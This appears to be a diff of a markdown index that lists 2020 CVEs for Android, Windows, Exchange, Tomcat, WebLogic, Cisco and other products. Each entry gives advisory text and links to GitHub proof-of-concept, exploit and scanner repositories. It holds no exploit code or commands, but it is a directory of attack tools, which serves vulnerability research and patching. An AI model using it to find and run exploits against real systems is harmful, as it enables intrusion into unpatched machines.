+In create of FileMap.cpp, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-8.0 Android-8.1 Android-9Android ID: A-156997193
+
+
+- [nanopathi/system_core_AOSP10_r33_CVE-2020-0409](https://github.com/nanopathi/system_core_AOSP10_r33_CVE-2020-0409)
+
+### CVE-2020-0413 (2020-10-14)
+
+In gatt_process_read_by_type_rsp of gatt_cl.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure in the Bluetooth server with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11 Android-8.0Android ID: A-158778659
+
+
+- [Satheesh575555/system_bt_AOSP10_r33_CVE-2020-0413](https://github.com/Satheesh575555/system_bt_AOSP10_r33_CVE-2020-0413)
+
### CVE-2020-0416 (2020-10-14)
In multiple settings screens, there are possible tapjacking attacks due to an insecure default value. This could lead to local escalation of privilege and permissions with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.0 Android-8.1Android ID: A-155288585
+- [ShaikUsaf/packages_apps_settings_AOSP10_r33_CVE-2020-0416](https://github.com/ShaikUsaf/packages_apps_settings_AOSP10_r33_CVE-2020-0416)
- [Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2020-0416](https://github.com/Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2020-0416)
### CVE-2020-0418 (2020-11-10)
@@ -5537,8 +22704,16 @@
In getPermissionInfosForGroup of Utils.java, there is a logic error. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-153879813
+- [Trinadh465/packages_apps_PackageInstaller_AOSP10_r33_CVE-2020-0418](https://github.com/Trinadh465/packages_apps_PackageInstaller_AOSP10_r33_CVE-2020-0418)
- [fernandodruszcz/CVE-2020-0418](https://github.com/fernandodruszcz/CVE-2020-0418)
+### CVE-2020-0421 (2020-10-14)
+
+In appendFormatV of String8.cpp, there is a possible out of bounds write due to incorrect error handling. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11 Android-8.0Android ID: A-161894517
+
+
+- [nanopathi/system_core_AOSP10_r33_CVE-2020-0421](https://github.com/nanopathi/system_core_AOSP10_r33_CVE-2020-0421)
+
### CVE-2020-0423 (2020-10-14)
In binder_release_work of binder.c, there is a possible use-after-free due to improper locking. This could lead to local escalation of privilege in the kernel with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-161151868References: N/A
@@ -5546,6 +22721,64 @@
- [sparrow-labz/CVE-2020-0423](https://github.com/sparrow-labz/CVE-2020-0423)
+### CVE-2020-0439 (2020-11-10)
+
+In generatePackageInfo of PackageManagerService.java, there is a possible permissions bypass due to an incorrect permission check. This could lead to local escalation of privilege that allows instant apps access to permissions not allowed for instant apps, with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11 Android-8.0Android ID: A-140256621
+
+
+- [Satheesh575555/frameworks_base_AOSP10_r33_CVE-2020-0439](https://github.com/Satheesh575555/frameworks_base_AOSP10_r33_CVE-2020-0439)
+
+### CVE-2020-0443 (2020-11-10)
+
+In LocaleList of LocaleList.java, there is a possible forced reboot due to an uncaught exception. This could lead to local denial of service requiring factory reset to restore with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-152410253
+
+
+- [Supersonic/CVE-2020-0443](https://github.com/Supersonic/CVE-2020-0443)
+
+### CVE-2020-0451 (2020-11-10)
+
+In sbrDecoder_AssignQmfChannels2SbrChannels of sbrdecoder.cpp, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-9 Android-8.0 Android-8.1Android ID: A-158762825
+
+
+- [nanopathi/external_aac_AOSP10_r33_CVE-2020-0451](https://github.com/nanopathi/external_aac_AOSP10_r33_CVE-2020-0451)
+
+### CVE-2020-0452 (2020-11-10)
+
+In exif_entry_get_value of exif-entry.c, there is a possible out of bounds write due to an integer overflow. This could lead to remote code execution if a third party app used this library to process remote image data with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11 Android-8.0Android ID: A-159625731
+
+
+- [ShaikUsaf/external_libexif_AOSP10_CVE-2020-0452](https://github.com/ShaikUsaf/external_libexif_AOSP10_CVE-2020-0452)
+
+### CVE-2020-0453 (2020-11-10)
+
+In updateNotification of BeamTransferManager.java, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-8.0 Android-8.1Android ID: A-159060474
+
+
+- [pazhanivel07/Nfc_CVE-2020-0453](https://github.com/pazhanivel07/Nfc_CVE-2020-0453)
+- [nanopathi/Packages_apps_Nfc_CVE-2020-0453](https://github.com/nanopathi/Packages_apps_Nfc_CVE-2020-0453)
+- [Trinadh465/packages_apps_Nfc_AOSP10_r33_CVE-2020-0453](https://github.com/Trinadh465/packages_apps_Nfc_AOSP10_r33_CVE-2020-0453)
+
+### CVE-2020-0458 (2020-12-14)
+
+In SPDIFEncoder::writeBurstBufferBytes and related methods of SPDIFEncoder.cpp, there is a possible out of bounds write due to an integer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-8.0 Android-8.1Android ID: A-160265164
+
+
+- [nanopathi/system_media_AOSP10_r33_CVE-2020-0458](https://github.com/nanopathi/system_media_AOSP10_r33_CVE-2020-0458)
+
+### CVE-2020-0463 (2020-12-14)
+
+In sdp_server_handle_client_req of sdp_server.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure from the bluetooth server with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-8.0 Android-8.1 Android-9Android ID: A-169342531
+
+
+- [nanopathi/system_bt_AOSP10_r33_CVE-2020-0463](https://github.com/nanopathi/system_bt_AOSP10_r33_CVE-2020-0463)
+
+### CVE-2020-0471 (2021-01-11)
+
+In reassemble_and_dispatch of packet_fragmenter.cc, there is a possible way to inject packets into an encrypted Bluetooth connection due to improper input validation. This could lead to remote escalation of privilege between two Bluetooth devices by a proximal attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-8.0, Android-8.1, Android-9, Android-10, Android-11; Android ID: A-169327567.
+
+
+- [nanopathi/system_bt_AOSP10_r33_CVE-2020-0471](https://github.com/nanopathi/system_bt_AOSP10_r33_CVE-2020-0471)
+
### CVE-2020-0551 (2020-03-12)
Load value injection in some Intel(R) Processors utilizing speculative execution may allow an authenticated user to potentially enable information disclosure via a side channel with local access. The list of affected products is provided in intel-sa-00334: https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00334.html
@@ -5604,10 +22837,18 @@
- [bsides-rijeka/meetup-2-curveball](https://github.com/bsides-rijeka/meetup-2-curveball)
- [exploitblizzard/CVE-2020-0601-spoofkey](https://github.com/exploitblizzard/CVE-2020-0601-spoofkey)
- [ShayNehmad/twoplustwo](https://github.com/ShayNehmad/twoplustwo)
+- [okanulkr/CurveBall-CVE-2020-0601-PoC](https://github.com/okanulkr/CurveBall-CVE-2020-0601-PoC)
- [cimashiro/-Awesome-CVE-2020-0601-](https://github.com/cimashiro/-Awesome-CVE-2020-0601-)
- [tyj956413282/curveball-plus](https://github.com/tyj956413282/curveball-plus)
- [JoelBts/CVE-2020-0601_PoC](https://github.com/JoelBts/CVE-2020-0601_PoC)
+### CVE-2020-0606 (2020-01-14)
+
+A remote code execution vulnerability exists in .NET software when the software fails to check the source markup of a file.An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user, aka '.NET Framework Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-0605.
+
+
+- [5l1v3r1/CVE-2020-0606](https://github.com/5l1v3r1/CVE-2020-0606)
+
### CVE-2020-0609 (2020-01-14)
A remote code execution vulnerability exists in Windows Remote Desktop Gateway (RD Gateway) when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests, aka 'Windows Remote Desktop Gateway (RD Gateway) Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-0610.
@@ -5626,6 +22867,7 @@
- [euphrat1ca/CVE-2020-0618](https://github.com/euphrat1ca/CVE-2020-0618)
- [wortell/cve-2020-0618](https://github.com/wortell/cve-2020-0618)
+- [itstarsec/CVE-2020-0618](https://github.com/itstarsec/CVE-2020-0618)
### CVE-2020-0624 (2020-01-14)
@@ -5642,6 +22884,8 @@
- [RedCursorSecurityConsulting/CVE-2020-0668](https://github.com/RedCursorSecurityConsulting/CVE-2020-0668)
- [Nan3r/CVE-2020-0668](https://github.com/Nan3r/CVE-2020-0668)
- [modulexcite/SysTracingPoc](https://github.com/modulexcite/SysTracingPoc)
+- [ycdxsb/CVE-2020-0668](https://github.com/ycdxsb/CVE-2020-0668)
+- [bypazs/CVE-2020-0668.exe](https://github.com/bypazs/CVE-2020-0668.exe)
- [0xSs0rZ/Windows_Exploit](https://github.com/0xSs0rZ/Windows_Exploit)
### CVE-2020-0674 (2020-02-11)
@@ -5652,6 +22896,7 @@
- [5l1v3r1/CVE-2020-0674](https://github.com/5l1v3r1/CVE-2020-0674)
- [maxpl0it/CVE-2020-0674-Exploit](https://github.com/maxpl0it/CVE-2020-0674-Exploit)
- [Ken-Abruzzi/CVE-2020-0674](https://github.com/Ken-Abruzzi/CVE-2020-0674)
+- [Neko-chanQwQ/CVE-2020-0674-PoC](https://github.com/Neko-chanQwQ/CVE-2020-0674-PoC)
- [Micky-Thongam/Internet-Explorer-UAF](https://github.com/Micky-Thongam/Internet-Explorer-UAF)
### CVE-2020-0683 (2020-02-11)
@@ -5684,6 +22929,9 @@
- [murataydemir/CVE-2020-0688](https://github.com/murataydemir/CVE-2020-0688)
- [zyn3rgy/ecp_slap](https://github.com/zyn3rgy/ecp_slap)
- [SLSteff/CVE-2020-0688-Scanner](https://github.com/SLSteff/CVE-2020-0688-Scanner)
+- [MrTiz/CVE-2020-0688](https://github.com/MrTiz/CVE-2020-0688)
+- [ann0906/proxylogon](https://github.com/ann0906/proxylogon)
+- [7heKnight/CVE-2020-0688](https://github.com/7heKnight/CVE-2020-0688)
- [1337-llama/CVE-2020-0688-Python3](https://github.com/1337-llama/CVE-2020-0688-Python3)
- [chudamax/CVE-2020-0688-Exchange2010](https://github.com/chudamax/CVE-2020-0688-Exchange2010)
- [W01fh4cker/CVE-2020-0688-GUI](https://github.com/W01fh4cker/CVE-2020-0688-GUI)
@@ -5711,6 +22959,7 @@
- [cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION](https://github.com/cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION)
- [MasterSploit/CVE-2020-0787](https://github.com/MasterSploit/CVE-2020-0787)
- [MasterSploit/CVE-2020-0787-BitsArbitraryFileMove-master](https://github.com/MasterSploit/CVE-2020-0787-BitsArbitraryFileMove-master)
+- [yanghaoi/CVE-2020-0787](https://github.com/yanghaoi/CVE-2020-0787)
### CVE-2020-0796 (2020-03-12)
@@ -5780,7 +23029,17 @@
- [AaronCaiii/CVE-2020-0796-POC](https://github.com/AaronCaiii/CVE-2020-0796-POC)
- [datntsec/CVE-2020-0796](https://github.com/datntsec/CVE-2020-0796)
- [MasterSploit/LPE---CVE-2020-0796](https://github.com/MasterSploit/LPE---CVE-2020-0796)
+- [1stPeak/CVE-2020-0796-Scanner](https://github.com/1stPeak/CVE-2020-0796-Scanner)
+- [Anonimo501/SMBGhost_CVE-2020-0796_checker](https://github.com/Anonimo501/SMBGhost_CVE-2020-0796_checker)
- [Opensitoo/cve-2020-0796](https://github.com/Opensitoo/cve-2020-0796)
+- [orangmuda/CVE-2020-0796](https://github.com/orangmuda/CVE-2020-0796)
+- [Murasame-nc/CVE-2020-0796-LPE-POC](https://github.com/Murasame-nc/CVE-2020-0796-LPE-POC)
+- [F6JO/CVE-2020-0796-Batch-scanning](https://github.com/F6JO/CVE-2020-0796-Batch-scanning)
+- [lisinan988/CVE-2020-0796-exp](https://github.com/lisinan988/CVE-2020-0796-exp)
+- [5l1v3r1/CVE-2020-0796-PoC-3](https://github.com/5l1v3r1/CVE-2020-0796-PoC-3)
+- [5l1v3r1/SMBGhosts](https://github.com/5l1v3r1/SMBGhosts)
+- [vsai94/ECE9069_SMBGhost_Exploit_CVE-2020-0796-](https://github.com/vsai94/ECE9069_SMBGhost_Exploit_CVE-2020-0796-)
+- [arzuozkan/CVE-2020-0796](https://github.com/arzuozkan/CVE-2020-0796)
- [SEHandler/CVE-2020-0796](https://github.com/SEHandler/CVE-2020-0796)
- [TweatherQ/CVE-2020-0796](https://github.com/TweatherQ/CVE-2020-0796)
- [krizzz07/CVE-2020-0796](https://github.com/krizzz07/CVE-2020-0796)
@@ -5811,12 +23070,35 @@
- [5l1v3r1/cve-2020-0802](https://github.com/5l1v3r1/cve-2020-0802)
+### CVE-2020-0812 (2020-03-12)
+
+A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge (HTML-based)L, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-0811.
+
+
+- [5l1v3r1/CVE-2020-0812](https://github.com/5l1v3r1/CVE-2020-0812)
+
+### CVE-2020-0887 (2020-03-12)
+
+An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0788, CVE-2020-0877.
+
+
+- [vinhthp1712/CVE-2020-0887](https://github.com/vinhthp1712/CVE-2020-0887)
+
### CVE-2020-0890 (2020-09-11)
<p>A denial of service vulnerability exists when Microsoft Hyper-V on a host server fails to properly validate specific malicious data from a user on a guest operating system.</p>\n<p>To exploit the vulnerability, an attacker who already has a privileged account on a guest operating system, running as a virtual machine, could run a specially crafted application.</p>\n<p>The security update addresses the vulnerability by resolving the conditions where Hyper-V would fail to handle these requests.</p>\n
- [gerhart01/hyperv_local_dos_poc](https://github.com/gerhart01/hyperv_local_dos_poc)
+- [skasanagottu57gmailv/gerhart01](https://github.com/skasanagottu57gmailv/gerhart01)
+- [MarcelloTinocor/gerhart01](https://github.com/MarcelloTinocor/gerhart01)
+
+### CVE-2020-0910 (2020-04-15)
+
+A remote code execution vulnerability exists when Windows Hyper-V on a host server fails to properly validate input from an authenticated user on a guest operating system, aka 'Windows Hyper-V Remote Code Execution Vulnerability'.
+
+
+- [kfmgang/CVE-2020-0910](https://github.com/kfmgang/CVE-2020-0910)
### CVE-2020-0976 (2020-04-15)
@@ -5832,6 +23114,14 @@
- [0xeb-bp/cve-2020-1015](https://github.com/0xeb-bp/cve-2020-1015)
+### CVE-2020-1020 (2020-04-15)
+
+A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font - Adobe Type 1 PostScript format.For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely, aka 'Adobe Font Manager Library Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-0938.
+
+
+- [CrackerCat/CVE-2020-1020-Exploit](https://github.com/CrackerCat/CVE-2020-1020-Exploit)
+- [KaLendsi/CVE-2020-1020](https://github.com/KaLendsi/CVE-2020-1020)
+
### CVE-2020-1034 (2020-09-11)
<p>An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.</p>\n<p>To exploit the vulnerability, a locally authenticated attacker could run a specially crafted application.</p>\n<p>The security update addresses the vulnerability by ensuring the Windows Kernel properly handles objects in memory.</p>\n
@@ -5866,6 +23156,7 @@
- [cbwang505/CVE-2020-1066-EXP](https://github.com/cbwang505/CVE-2020-1066-EXP)
+- [xyddnljydd/cve-2020-1066](https://github.com/xyddnljydd/cve-2020-1066)
### CVE-2020-1102 (2020-05-21)
@@ -5882,6 +23173,7 @@
- [jamf/CVE-2020-1206-POC](https://github.com/jamf/CVE-2020-1206-POC)
- [Info-Security-Solution-Kolkata/CVE-2020-1206-Exploit](https://github.com/Info-Security-Solution-Kolkata/CVE-2020-1206-Exploit)
- [Info-Security-Solution-Kolkata/Smbleed-CVE-2020-1206-Exploit](https://github.com/Info-Security-Solution-Kolkata/Smbleed-CVE-2020-1206-Exploit)
+- [datntsec/CVE-2020-1206](https://github.com/datntsec/CVE-2020-1206)
### CVE-2020-1283 (2020-06-09)
@@ -5913,6 +23205,7 @@
- [VoidSec/CVE-2020-1337](https://github.com/VoidSec/CVE-2020-1337)
- [neofito/CVE-2020-1337](https://github.com/neofito/CVE-2020-1337)
- [sailay1996/cve-2020-1337-poc](https://github.com/sailay1996/cve-2020-1337-poc)
+- [ZTK-009/cve-2020-1337-poc](https://github.com/ZTK-009/cve-2020-1337-poc)
### CVE-2020-1349 (2020-07-14)
@@ -5997,7 +23290,18 @@
- [JayP232/The_big_Zero](https://github.com/JayP232/The_big_Zero)
- [b1ack0wl/CVE-2020-1472](https://github.com/b1ack0wl/CVE-2020-1472)
- [SaharAttackit/CVE-2020-1472](https://github.com/SaharAttackit/CVE-2020-1472)
+- [wrathfulDiety/zerologon](https://github.com/wrathfulDiety/zerologon)
+- [YossiSassi/ZeroLogon-Exploitation-Check](https://github.com/YossiSassi/ZeroLogon-Exploitation-Check)
+- [sho-luv/zerologon](https://github.com/sho-luv/zerologon)
+- [hell-moon/ZeroLogon-Exploit](https://github.com/hell-moon/ZeroLogon-Exploit)
+- [Udyz/Zerologon](https://github.com/Udyz/Zerologon)
+- [itssmikefm/CVE-2020-1472](https://github.com/itssmikefm/CVE-2020-1472)
+- [B34MR/zeroscan](https://github.com/B34MR/zeroscan)
+- [TheJoyOfHacking/SecuraBV-CVE-2020-1472](https://github.com/TheJoyOfHacking/SecuraBV-CVE-2020-1472)
+- [TheJoyOfHacking/dirkjanm-CVE-2020-1472](https://github.com/TheJoyOfHacking/dirkjanm-CVE-2020-1472)
+- [Anonymous-Family/Zero-day-scanning](https://github.com/Anonymous-Family/Zero-day-scanning)
- [Anonymous-Family/CVE-2020-1472](https://github.com/Anonymous-Family/CVE-2020-1472)
+- [carlos55ml/zerologon](https://github.com/carlos55ml/zerologon)
- [Rvn0xsy/ZeroLogon](https://github.com/Rvn0xsy/ZeroLogon)
- [guglia001/MassZeroLogon](https://github.com/guglia001/MassZeroLogon)
- [likeww/MassZeroLogon](https://github.com/likeww/MassZeroLogon)
@@ -6031,6 +23335,13 @@
- [jpts/cve-2020-1764-poc](https://github.com/jpts/cve-2020-1764-poc)
+### CVE-2020-1937 (2020-02-24)
+
+Kylin has some restful apis which will concatenate SQLs with the user input string, a user is likely to be able to run malicious database queries.
+
+
+- [shanika04/apache_kylin](https://github.com/shanika04/apache_kylin)
+
### CVE-2020-1938 (2020-02-24)
When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed: - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations.
@@ -6058,7 +23369,12 @@
- [I-Runtime-Error/CVE-2020-1938](https://github.com/I-Runtime-Error/CVE-2020-1938)
- [Umesh2807/Ghostcat](https://github.com/Umesh2807/Ghostcat)
- [MateoSec/ghostcatch](https://github.com/MateoSec/ghostcatch)
+- [acodervic/CVE-2020-1938-MSF-MODULE](https://github.com/acodervic/CVE-2020-1938-MSF-MODULE)
- [Hancheng-Lei/Hacking-Vulnerability-CVE-2020-1938-Ghostcat](https://github.com/Hancheng-Lei/Hacking-Vulnerability-CVE-2020-1938-Ghostcat)
+- [streghstreek/CVE-2020-1938](https://github.com/streghstreek/CVE-2020-1938)
+- [Neko-chanQwQ/CVE-2020-1938](https://github.com/Neko-chanQwQ/CVE-2020-1938)
+- [jptr218/ghostcat](https://github.com/jptr218/ghostcat)
+- [einzbernnn/CVE-2020-1938Scan](https://github.com/einzbernnn/CVE-2020-1938Scan)
- [YounesTasra-R4z3rSw0rd/CVE-2020-1938](https://github.com/YounesTasra-R4z3rSw0rd/CVE-2020-1938)
- [tpt11fb/AttackTomcat](https://github.com/tpt11fb/AttackTomcat)
- [Warelock/cve-2020-1938](https://github.com/Warelock/cve-2020-1938)
@@ -6084,6 +23400,13 @@
- [M3g4Byt3/cve-2020-1948-poc](https://github.com/M3g4Byt3/cve-2020-1948-poc)
- [L0kiii/Dubbo-deserialization](https://github.com/L0kiii/Dubbo-deserialization)
+### CVE-2020-1956 (2020-05-22)
+
+Apache Kylin 2.3.0, and releases up to 2.6.5 and 3.0.1 has some restful apis which will concatenate os command with the user input string, a user is likely to be able to execute any os command without any protection or validation.
+
+
+- [b510/CVE-2020-1956](https://github.com/b510/CVE-2020-1956)
+
### CVE-2020-1958 (2020-04-01)
When LDAP authentication is enabled in Apache Druid 0.17.0, callers of Druid APIs with a valid set of LDAP credentials can bypass the credentialsValidator.userSearch filter barrier that determines if a valid LDAP user is allowed to authenticate with Druid. They are still subject to role-based authorization checks, if configured. Callers of Druid APIs can also retrieve any LDAP attribute values of users that exist on the LDAP server, so long as that information is visible to the Druid server. This information disclosure does not require the caller itself to be a valid LDAP user.
@@ -6129,6 +23452,13 @@
### CVE-2020-2333
- [section-c/CVE-2020-2333](https://github.com/section-c/CVE-2020-2333)
+### CVE-2020-2501 (2021-02-17)
+
+A stack-based buffer overflow vulnerability has been reported to affect QNAP NAS devices running Surveillance Station. If exploited, this vulnerability allows attackers to execute arbitrary code. QNAP have already fixed this vulnerability in the following versions: Surveillance Station 5.1.5.4.3 (and later) for ARM CPU NAS (64bit OS) and x86 CPU NAS (64bit OS) Surveillance Station 5.1.5.3.3 (and later) for ARM CPU NAS (32bit OS) and x86 CPU NAS (32bit OS)
+
+
+- [Alonzozzz/alonzzzo](https://github.com/Alonzozzz/alonzzzo)
+
### CVE-2020-2509 (2021-04-16)
A command injection vulnerability has been reported to affect QTS and QuTS hero. If exploited, this vulnerability allows attackers to execute arbitrary commands in a compromised application. We have already fixed this vulnerability in the following versions: QTS 4.5.2.1566 Build 20210202 and later QTS 4.5.1.1495 Build 20201123 and later QTS 4.3.6.1620 Build 20210322 and later QTS 4.3.4.1632 Build 20210324 and later QTS 4.3.3.1624 Build 20210416 and later QTS 4.2.6 Build 20210327 and later QuTS hero h4.5.1.1491 build 20201119 and later
@@ -6155,6 +23485,8 @@
- [zzwlpx/weblogicPoc](https://github.com/zzwlpx/weblogicPoc)
- [Dido1960/Weblogic-CVE-2020-2551-To-Internet](https://github.com/Dido1960/Weblogic-CVE-2020-2551-To-Internet)
- [DaMinGshidashi/CVE-2020-2551](https://github.com/DaMinGshidashi/CVE-2020-2551)
+- [LTiDi2000/CVE-2020-2551](https://github.com/LTiDi2000/CVE-2020-2551)
+- [0xAbbarhSF/CVE-Exploit](https://github.com/0xAbbarhSF/CVE-Exploit)
### CVE-2020-2553 (2020-04-15)
@@ -6173,6 +23505,7 @@
- [Y4er/CVE-2020-2555](https://github.com/Y4er/CVE-2020-2555)
- [Maskhe/cve-2020-2555](https://github.com/Maskhe/cve-2020-2555)
- [Uvemode/CVE-2020-2555](https://github.com/Uvemode/CVE-2020-2555)
+- [Qynklee/POC_CVE-2020-2555](https://github.com/Qynklee/POC_CVE-2020-2555)
### CVE-2020-2556 (2020-01-15)
@@ -6199,6 +23532,14 @@
- [Y4er/WebLogic-Shiro-shell](https://github.com/Y4er/WebLogic-Shiro-shell)
- [FancyDoesSecurity/CVE-2020-2883](https://github.com/FancyDoesSecurity/CVE-2020-2883)
- [Al1ex/CVE-2020-2883](https://github.com/Al1ex/CVE-2020-2883)
+- [Qynklee/POC_CVE-2020-2883](https://github.com/Qynklee/POC_CVE-2020-2883)
+
+### CVE-2020-2950 (2020-04-15)
+
+Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Analytics Web General). Supported versions that are affected are 5.5.0.0.0, 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks of this vulnerability can result in takeover of Oracle Business Intelligence Enterprise Edition. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
+
+
+- [tuo4n8/CVE-2020-2950](https://github.com/tuo4n8/CVE-2020-2950)
### CVE-2020-2969 (2020-07-15)
@@ -6237,6 +23578,7 @@
- [CrackerCat/CVE-2020-3187](https://github.com/CrackerCat/CVE-2020-3187)
- [1337in/CVE-2020-3187](https://github.com/1337in/CVE-2020-3187)
+- [sujaygr8/CVE-2020-3187](https://github.com/sujaygr8/CVE-2020-3187)
- [sunyyer/CVE-2020-3187-Scanlist](https://github.com/sunyyer/CVE-2020-3187-Scanlist)
- [Cappricio-Securities/CVE-2020-3187](https://github.com/Cappricio-Securities/CVE-2020-3187)
@@ -6265,6 +23607,13 @@
- [3ndG4me/CVE-2020-3452-Exploit](https://github.com/3ndG4me/CVE-2020-3452-Exploit)
- [grim3/CVE-2020-3452](https://github.com/grim3/CVE-2020-3452)
- [cygenta/CVE-2020-3452](https://github.com/cygenta/CVE-2020-3452)
+- [darklotuskdb/CISCO-CVE-2020-3452-Scanner-Exploiter](https://github.com/darklotuskdb/CISCO-CVE-2020-3452-Scanner-Exploiter)
+- [fuzzlove/Cisco-ASA-FTD-Web-Services-Traversal](https://github.com/fuzzlove/Cisco-ASA-FTD-Web-Services-Traversal)
+- [faisalfs10x/Cisco-CVE-2020-3452-shodan-scanner](https://github.com/faisalfs10x/Cisco-CVE-2020-3452-shodan-scanner)
+- [sujaygr8/CVE-2020-3452](https://github.com/sujaygr8/CVE-2020-3452)
+- [Aviksaikat/CVE-2020-3452](https://github.com/Aviksaikat/CVE-2020-3452)
+- [Veids/CVE-2020-3452_auto](https://github.com/Veids/CVE-2020-3452_auto)
+- [iveresk/cve-2020-3452](https://github.com/iveresk/cve-2020-3452)
- [imhunterand/CVE-2020-3452](https://github.com/imhunterand/CVE-2020-3452)
- [Cappricio-Securities/CVE-2020-3452](https://github.com/Cappricio-Securities/CVE-2020-3452)
@@ -6273,6 +23622,8 @@
Multiple vulnerabilities in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the web services interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web services interface of an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations. For more information, see the Vulnerable Products section.
+- [Hudi233/CVE-2020-3580](https://github.com/Hudi233/CVE-2020-3580)
+- [adarshvs/CVE-2020-3580](https://github.com/adarshvs/CVE-2020-3580)
- [cruxN3T/CVE-2020-3580](https://github.com/cruxN3T/CVE-2020-3580)
- [catatonicprime/CVE-2020-3580](https://github.com/catatonicprime/CVE-2020-3580)
- [imhunterand/CVE-2020-3580](https://github.com/imhunterand/CVE-2020-3580)
@@ -6315,6 +23666,7 @@
- [HynekPetrak/CVE-2019-5544_CVE-2020-3992](https://github.com/HynekPetrak/CVE-2019-5544_CVE-2020-3992)
+- [dgh05t/VMware_ESXI_OpenSLP_PoCs](https://github.com/dgh05t/VMware_ESXI_OpenSLP_PoCs)
### CVE-2020-4040 (2020-06-08)
@@ -6342,6 +23694,7 @@
IBM WebSphere Application Server 7.0, 8.0, 8.5, and 9.0 traditional could allow a remote attacker to execute arbitrary code on a system with a specially-crafted sequence of serialized objects over the SOAP connector. IBM X-Force ID: 181489.
+- [silentsignal/WebSphere-WSIF-gadget](https://github.com/silentsignal/WebSphere-WSIF-gadget)
- [yonggui-li/CVE-2020-4464-and-CVE-2020-4450](https://github.com/yonggui-li/CVE-2020-4464-and-CVE-2020-4450)
### CVE-2020-5014 (2021-03-07)
@@ -6371,6 +23724,7 @@
- [indevi0us/CVE-2020-5248](https://github.com/indevi0us/CVE-2020-5248)
+- [Mkway/CVE-2020-5248](https://github.com/Mkway/CVE-2020-5248)
### CVE-2020-5250 (2020-03-05)
@@ -6425,6 +23779,20 @@
- [dead5nd/config-demo](https://github.com/dead5nd/config-demo)
- [osamahamad/CVE-2020-5410-POC](https://github.com/osamahamad/CVE-2020-5410-POC)
